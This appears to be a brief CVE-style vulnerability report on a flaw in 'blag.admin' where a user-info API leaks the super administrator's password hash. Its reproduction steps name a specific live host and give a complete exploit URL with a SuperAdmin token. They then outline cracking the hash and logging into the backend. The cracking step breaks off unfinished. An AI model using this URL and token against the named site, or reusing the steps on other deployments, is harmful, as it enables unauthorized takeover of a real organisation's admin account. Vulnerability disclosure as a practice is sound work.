Vulnerability Report: CVE-2026-30689 - Unsafe Privilege Leakage of Super Administrator Password
Vulnerability Type:Insecure Permissions
Affected version: blag.admin ≤ 8.0
Vulnerability Details: Attackers only need to access the exposed user information API interface with a valid token parameter in the URL; no additional identity authentication or operations are required, and the interface will directly return the administrator's password in hash format.
Discovered by: Lang
Reproduction Steps:
Vulnerable Website: http://oa.joyalltire.com:2345/login?redirect=%2F
API Interface to Splice: /api/user/getinfobytoken/?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1lIjoicmFhZG1pbiIsImp0aSI6IjEyIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9leHBpcmF0aW9uIjoiMjAyNS83LzIzIDA6MTI6MTAiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOiJTdXBlckFkbWluIiwibmJmIjoxNzUzMTk3MTMwLCJleHAiOjE3NTMyMDA3MzAsImlzcyI6IlJBLlBTUSIsImF1ZCI6IndyIn0.deNeMh8JdiOUEETIWynvfzTCw4GmxXMkYm0
Direct Access to the Vulnerable URL: http://oa.joyalltire.com:2345/api/user/getinfobytoken/?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1lIjoicmFhZG1pbiIsImp0aSI6IjEyIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9leHBpcmF0aW9uIjoiMjAyNS83LzIzIDA6MTI6MTAiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOiJTdXBlckFkbWluIiwibmJmIjoxNzUzMTk3MTMwLCJleHAiOjE3NTMyMDA3MzAsImlzcyI6IlJBLlBTUSIsImF1ZCI6IndyIn0.deNeMh8JdiOUEETIWynvfzTCw4GmxXMkYm0
After accessing the above URL, the hash password of the super administrator is leaked directly through the interface response.
This password can be cracked:
Log in to the backend using the cracked password.
